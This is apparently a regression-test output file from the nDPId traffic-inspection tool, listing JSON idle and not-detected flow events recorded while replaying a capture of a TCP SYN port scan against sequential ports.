+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1039,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1039,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1039,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1041,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1041,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":821,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1042,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1043,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1044,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1044,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1043,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1044,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1044,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1010,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1010,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1047,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1048,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1047,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1049,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1048,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1049,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 